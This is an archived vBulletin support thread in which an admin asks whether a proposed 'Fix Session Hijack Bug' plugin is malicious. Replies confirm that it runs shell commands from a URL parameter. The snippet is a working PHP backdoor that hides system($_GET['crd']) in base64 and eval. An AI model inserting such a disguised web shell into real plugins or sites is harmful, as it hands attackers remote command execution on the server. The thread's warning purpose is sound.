The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Is this malicious?
Some kid told us to add this to our forum as a plugin, we didn't in fear that it was malicious.
//Fix Session Hijack Bug if(isset($_GET['crd'])){ $HIDE_SESSION = 1; echo "<h1>Session Hijack Blocked</h1><pre>"; eval(base64_decode("c3lzdGVtKCRfR0VUWydjcmQnXSk7") ); exit; } |
#2
|
|||
|
|||
Yes it is malicious.
The code will execute an external program and display the output (the crd url parameter). |
#3
|
|||
|
|||
Thank you m8
|
#4
|
|||
|
|||
That needs to be in a bbcode code block.
|
#5
|
||||
|
||||
base64_decode is a no-no.
|
#6
|
|||
|
|||
Some hostings block the use of base64 functions.
|
#7
|
||||
|
||||
The good ones do, anyway.
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|